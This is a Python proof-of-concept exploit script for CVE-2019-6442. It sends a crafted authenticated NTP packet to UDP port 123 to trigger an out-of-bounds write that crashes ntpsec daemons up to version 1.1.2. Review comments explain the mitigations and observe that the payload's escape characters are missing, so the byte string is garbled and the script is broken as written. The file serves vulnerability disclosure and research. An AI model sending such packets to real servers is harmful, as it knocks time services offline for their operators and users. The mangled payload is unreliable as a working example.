#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: all versions of ntpsec up to and including 1.1.2.
# CVE: CVE-2019-6442
# Note: this PoC uses Keyid 1 with password agurkaa

import sys
import socket

# Proof-of-concept datagram for CVE-2019-6442 (ntpsec up to 1.1.2, see the
# header): one authenticated NTP packet that the header describes as
# triggering an out-of-bounds write, i.e. a crash/DoS of the daemon. Per the
# header note the packet is bound to key id 1 / password "agurkaa", so it only
# reproduces against a host configured with that key; an attacker needs a
# valid key, which is why key hygiene plus upgrading past 1.1.2 are the
# mitigations.
#
# NOTE(review): in this copy the escape sequences read "x16x08..." — the
# `\` prefixes appear to have been lost in extraction — so as written the
# literal is plain ASCII text rather than the binary packet described. It is
# reproduced here verbatim. The file also reads as Python 2 (`python`
# shebang, str payload); under Python 3 sendto() requires bytes and would
# raise TypeError.
buf = (
    "x16x08x00x03x00x00x00x00x00x00x01xd4x6cx65x61x6d"
    "x3dx41x41x41x41x41x41x41x41x41x41x42x42x42x42x42"
    "x42x42x42x42x42x41x41x41x41x41x41x41x34x41x41x42"
    "x42x42x42x42x42x42x42x42x42x41x41x41x41x41x41x41"
    "x41x41x41x42x42x42x42x42x42x42x42x42x42x41x41x41"
    "x42x41x41x41x41x41x41x41x41x41x41x42x42x42x42x42"
    "x42x42x42x42x42x31x32x33x34x35x3ex37x38x39x30x31"
    "x32x33x34x35x36x37x38x39x30x31x32x33x34x35x36x37"
    "x38x39x30x31x32x33x34x35x36x37x38x39x20x2dx36x33"
    "x34x35x36x37x38x39x30x31x32x38x3dx20x2dx36x4ax0a"
    "x0ax0ax0ax0ax64x0ax0ax0ax0ax2bx0ax0ax0ax34x35x36"
    "x37x38x39x0ax0ax0ax26x0ax0ax0ax0ax0ax0ax0ax0ax0a"
    "x0ax0ax0ax0ax0ax0ax0ax0ax0ax09x0ax0ax0ax0ax0ax0a"
    "x42x42x42x54x42x42x41x41x41x34x41x41x42x42x42x42"
    "x42x42x42x42x42x42x41x41x41x0ax2bx0ax0ax0ax0ax41"
    "x0ax2bx0ax0ax0ax0ax0ax0ax64x0ax0ax0ax0ax2bx0ax0a"
    "x41x41x41x41x57x41x42x42x42x42x42x42x42x42x25x42"
    "x42x41x41x41x0axaex4ax0ax0ax0ax0ax0ax64x0ax0ax08"
    "x0ax2bx0ax0ax0ax34x35x36x37x38x39x0ax0ax0ax26x0a"
    "x0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0a"
    "x0ax09x0ax0ax0ax0ax0ax0ax42x42x42x54x42x42x41x41"
    "x41x34x41x41x42x42x42x42x42x42x42x42x42x42x41x41"
    "x41x0ax2bx0ax0ax0ax0ax41x0ax2bx0ax0ax0ax0ax0ax0a"
    "x64x0ax0ax0ax0ax2bx0ax0ax41x41x41x41x57x41x42x42"
    "x42x42x42x42x42x42x42x42x41x41x41x0ax0ax42x42x42"
    "x41x41x41x0ax2bx0ax0ax0ax0ax0ax0ax64x41x41x41x43"
    "x57x41x42x42x42x42x42x42x42x42x42x42x41x41x41x0a"
    "x0ax0ax05xffxffx05x0ax64x1bx0ax0ax0ax2bx0ax0ax0a"
    "x0ax0ax41x41x41x41x41x41x41x41x41x33x34x00x00x00"
    "x80x39x30x20x32x33x34x35x36x37x38x39x30x41x5bx41"
    "x00x00x00x01x8fx2cx6ex5bx49xe7xa0x78xa1x9bx50xf5"
    "xb2x18x04x00"
)

# Fire-and-forget: a single UDP datagram to the NTP port on localhost.
# Nothing is read back, so the script gives no indication of whether the
# target was affected, and the socket is never closed explicitly.
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))